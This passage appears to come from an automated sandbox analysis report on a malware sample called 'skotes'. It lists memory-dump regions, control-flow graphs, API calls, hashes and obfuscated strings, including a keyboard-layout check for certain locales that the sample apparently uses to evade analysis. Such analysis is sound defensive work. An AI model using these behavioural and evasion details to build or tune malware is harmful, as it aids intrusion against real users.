                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3463645711.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464669746.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3466594651.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467635601.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467790959.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469684463.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469922798.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3473492363.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3474734079.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3475645098.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476651388.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476938674.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477070298.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477264101.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477393595.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477657476.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477851250.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478022799.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478177580.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478382081.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478540619.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478784297.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478916346.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479082698.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479224017.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480189121.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480364133.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480502735.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480582275.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480721803.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480920537.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481180448.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481324628.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481427628.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: EnumOpenValue
                                                                                                                                                                                                                                              • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
                                                                                                                                                                                                                                              • API String ID: 2571532894-3963862150
                                                                                                                                                                                                                                              • Opcode ID: b1479c9985eab10211e37732f171c8f9df567ed03088e85c0f87daace81967a2
                                                                                                                                                                                                                                              • Instruction ID: 614f13efdee374b8193858c013d9659a8756d674951e2b133e02516e677d4d78
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b1479c9985eab10211e37732f171c8f9df567ed03088e85c0f87daace81967a2
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EFB1B0719002689BDB24DB14CC85BDEB7B9EF15300F5402D9E508E7292DB74AFE88F95

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 1826 bd7d30-bd7db2 call c040f0 1830 bd7db8-bd7de0 call be7a00 call bd5c10 1826->1830 1831 bd8356-bd8373 call becff1 1826->1831 1838 bd7de4-bd7e06 call be7a00 call bd5c10 1830->1838 1839 bd7de2 1830->1839 1844 bd7e08 1838->1844 1845 bd7e0a-bd7e23 1838->1845 1839->1838 1844->1845 1848 bd7e25-bd7e34 1845->1848 1849 bd7e54-bd7e7f 1845->1849 1850 bd7e4a-bd7e51 call bed663 1848->1850 1851 bd7e36-bd7e44 1848->1851 1852 bd7e81-bd7e90 1849->1852 1853 bd7eb0-bd7ed1 1849->1853 1850->1849 1851->1850 1856 bd8374 call c06c6a 1851->1856 1858 bd7ea6-bd7ead call bed663 1852->1858 1859 bd7e92-bd7ea0 1852->1859 1854 bd7ed7-bd7edc 1853->1854 1855 bd7ed3-bd7ed5 GetNativeSystemInfo 1853->1855 1860 bd7edd-bd7ee6 1854->1860 1855->1860 1868 bd8379-bd837f call c06c6a 1856->1868 1858->1853 1859->1856 1859->1858 1866 bd7ee8-bd7eef 1860->1866 1867 bd7f04-bd7f07 1860->1867 1869 bd7ef5-bd7eff 1866->1869 1870 bd8351 1866->1870 1871 bd7f0d-bd7f16 1867->1871 1872 bd82f7-bd82fa 1867->1872 1874 bd834c 1869->1874 1870->1831 1875 bd7f29-bd7f2c 1871->1875 1876 bd7f18-bd7f24 1871->1876 1872->1870 1877 bd82fc-bd8305 1872->1877 1874->1870 1879 bd82d4-bd82d6 1875->1879 1880 bd7f32-bd7f39 1875->1880 1876->1874 1881 bd832c-bd832f 1877->1881 1882 bd8307-bd830b 1877->1882 1885 bd82d8-bd82e2 1879->1885 1886 bd82e4-bd82e7 1879->1886 1887 bd7f3f-bd7f9b call be7a00 call bd5c10 call be7a00 call bd5c10 call bd5d50 1880->1887 1888 bd8019-bd82bd call be7a00 call bd5c10 call be7a00 call bd5c10 call bd5d50 call be7a00 call bd5c10 call bd5730 call be7a00 call bd5c10 call be7a00 call bd5c10 call bd5d50 call be7a00 call bd5c10 call bd5730 call be7a00 call bd5c10 call be7a00 call bd5c10 call bd5d50 call be7a00 call bd5c10 call bd5730 call be7a00 call bd5c10 call be7a00 call bd5c10 call bd5d50 call be7a00 call bd5c10 call bd5730 1880->1888 1883 bd833d-bd8349 1881->1883 1884 bd8331-bd833b 1881->1884 1889 bd830d-bd8312 1882->1889 1890 bd8320-bd832a 1882->1890 1883->1874 1884->1870 1885->1874 1886->1870 1892 bd82e9-bd82f5 1886->1892 1911 bd7fa0-bd7fa7 1887->1911 1925 bd82c3-bd82cc 1888->1925 1889->1890 1894 bd8314-bd831e 1889->1894 1890->1870 1892->1874 1894->1870 1913 bd7fa9 1911->1913 1914 bd7fab-bd7fcb call c08bbe 1911->1914 1913->1914 1921 bd7fcd-bd7fdc 1914->1921 1922 bd8002-bd8004 1914->1922 1926 bd7fde-bd7fec 1921->1926 1927 bd7ff2-bd7fff call bed663 1921->1927 1924 bd800a-bd8014 1922->1924 1922->1925 1924->1925 1925->1872 1930 bd82ce 1925->1930 1926->1868 1926->1927 1927->1922 1930->1879
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00BD7ED3
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3457897829.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457753663.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457897829.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458429750.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458649300.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458785892.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459052762.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459270282.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3460431228.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3461770601.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3463645711.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464669746.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3466594651.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467635601.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467790959.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469684463.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469922798.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3473492363.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3474734079.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3475645098.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476651388.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476938674.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477070298.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477264101.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477393595.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477657476.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477851250.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478022799.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478177580.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478382081.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478540619.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478784297.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478916346.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479082698.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479224017.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480189121.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480364133.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480502735.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480582275.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480721803.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480920537.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481180448.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481324628.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481427628.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InfoNativeSystem
                                                                                                                                                                                                                                              • String ID: JjsrPl==$JjsrQV==$JjssOl==$JjssPV==
                                                                                                                                                                                                                                              • API String ID: 1721193555-3123340372
                                                                                                                                                                                                                                              • Opcode ID: 9eeea9dc02e68c2e3ccaf795778a011644fbdca17b98cb51a040313560d0c20b
                                                                                                                                                                                                                                              • Instruction ID: 9d5ed731d8bd18d184b0107d01ed814aa41342acb7c5bc1d0aec99ed843c8420
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9eeea9dc02e68c2e3ccaf795778a011644fbdca17b98cb51a040313560d0c20b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9BE1C771E106449BDF24BB28DC4B79DBBA2AB41720F9442DDE419673C2EF354E858BC2

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 1980 c11abc-c11aec call c1180a 1983 c11b07-c11b13 call c0bf3a 1980->1983 1984 c11aee-c11af9 call c075e3 1980->1984 1990 c11b15-c11b2a call c075e3 call c075f6 1983->1990 1991 c11b2c-c11b75 call c11775 1983->1991 1989 c11afb-c11b02 call c075f6 1984->1989 2000 c11de1-c11de5 1989->2000 1990->1989 1998 c11be2-c11beb GetFileType 1991->1998 1999 c11b77-c11b80 1991->1999 2004 c11c34-c11c37 1998->2004 2005 c11bed-c11c1e call c075c0 1998->2005 2002 c11b82-c11b86 1999->2002 2003 c11bb7-c11bdd call c075c0 1999->2003 2002->2003 2007 c11b88-c11bb5 call c11775 2002->2007 2003->1989 2008 c11c40-c11c46 2004->2008 2009 c11c39-c11c3e 2004->2009 2005->1989 2028 c11c24-c11c2f call c075f6 2005->2028 2007->1998 2007->2003 2013 c11c4a-c11c98 call c0be85 2008->2013 2014 c11c48 2008->2014 2009->2013 2022 c11cb7-c11cdf call c11522 2013->2022 2023 c11c9a-c11ca6 call c11984 2013->2023 2014->2013 2032 c11ce1-c11ce2 2022->2032 2033 c11ce4-c11d25 2022->2033 2023->2022 2030 c11ca8 2023->2030 2028->1989 2034 c11caa-c11cb2 call c0af48 2030->2034 2032->2034 2036 c11d27-c11d2b 2033->2036 2037 c11d46-c11d54 2033->2037 2034->2000 2036->2037 2039 c11d2d-c11d41 2036->2039 2040 c11d5a-c11d5e 2037->2040 2041 c11ddf 2037->2041 2039->2037 2040->2041 2043 c11d60-c11d93 call c11775 2040->2043 2041->2000 2047 c11d95-c11dc1 call c075c0 call c0c04d 2043->2047 2048 c11dc7-c11ddb 2043->2048 2047->2048 2048->2041
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00C11775: CreateFileW.KERNEL32(00000000,00000000,?,00C11B65,?,?,00000000,?,00C11B65,00000000,0000000C), ref: 00C11792
                                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 00C11BD7
                                                                                                                                                                                                                                              • GetFileType.KERNEL32(00000000), ref: 00C11BE3
                                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 00C11BF6
                                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 00C11D9C
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3457897829.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457753663.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457897829.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458429750.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458649300.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458785892.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459052762.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459270282.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3460431228.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3461770601.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3463645711.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464669746.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3466594651.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467635601.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467790959.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469684463.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469922798.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3473492363.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3474734079.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3475645098.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476651388.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476938674.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477070298.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477264101.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477393595.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477657476.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477851250.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478022799.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478177580.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478382081.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478540619.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478784297.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478916346.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479082698.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479224017.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480189121.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480364133.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480502735.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480582275.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480721803.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480920537.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481180448.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481324628.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481427628.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: __dosmaperr$File$CreateType
                                                                                                                                                                                                                                              • String ID: H
                                                                                                                                                                                                                                              • API String ID: 3443242726-2852464175
                                                                                                                                                                                                                                              • Opcode ID: 7a319038e747293765e1dd8534d748f42b968216e8f798bbb17a3f9a413349d9
                                                                                                                                                                                                                                              • Instruction ID: c82e69e9e935cc12a3a3f9a9ecb520b0cead2746758fdbe95ec791870a7a06ca
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7a319038e747293765e1dd8534d748f42b968216e8f798bbb17a3f9a413349d9
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E3A12432A141489FCF1DEF68DD52BEE3BA1AB07320F180189ED11AB2D1D7389D52E751

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 2418 c126f2-c1271a call c12133 call c12191 2423 c12720-c1272c call c12139 2418->2423 2424 c12842-c1289e call c06c87 call c162ee 2418->2424 2423->2424 2430 c12732-c1273e call c12165 2423->2430 2436 c128a0-c128a6 2424->2436 2437 c128a8-c128ab 2424->2437 2430->2424 2435 c12744-c12765 call c0adf5 GetTimeZoneInformation 2430->2435 2445 c12820-c12841 call c1212d call c12121 call c12127 2435->2445 2446 c1276b-c1278c 2435->2446 2439 c128ee-c12900 2436->2439 2437->2439 2440 c128ad-c128bd call c0b04b 2437->2440 2442 c12910 2439->2442 2443 c12902-c12905 2439->2443 2455 c128c7-c128e0 call c162ee 2440->2455 2456 c128bf 2440->2456 2449 c12915-c1292a call c0adf5 call becff1 2442->2449 2450 c12910 call c126f2 2442->2450 2443->2442 2447 c12907-c1290e call c12517 2443->2447 2451 c12796-c1279d 2446->2451 2452 c1278e-c12793 2446->2452 2447->2449 2450->2449 2458 c127af-c127b1 2451->2458 2459 c1279f-c127a6 2451->2459 2452->2451 2471 c128e2-c128e3 2455->2471 2472 c128e5-c128eb call c0adf5 2455->2472 2462 c128c0-c128c5 call c0adf5 2456->2462 2466 c127b3-c127dc call c0ef17 call c0e926 2458->2466 2459->2458 2465 c127a8-c127ad 2459->2465 2480 c128ed 2462->2480 2465->2466 2485 c127ea-c127ec 2466->2485 2486 c127de-c127e1 2466->2486 2471->2462 2472->2480 2480->2439 2488 c127ee-c1280c call c0e926 2485->2488 2486->2485 2487 c127e3-c127e8 2486->2487 2487->2488 2491 c1281b-c1281e 2488->2491 2492 c1280e-c12811 2488->2492 2491->2445 2492->2491 2493 c12813-c12819 2492->2493 2493->2445
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00C26758), ref: 00C1275C
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3457897829.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457753663.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457897829.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
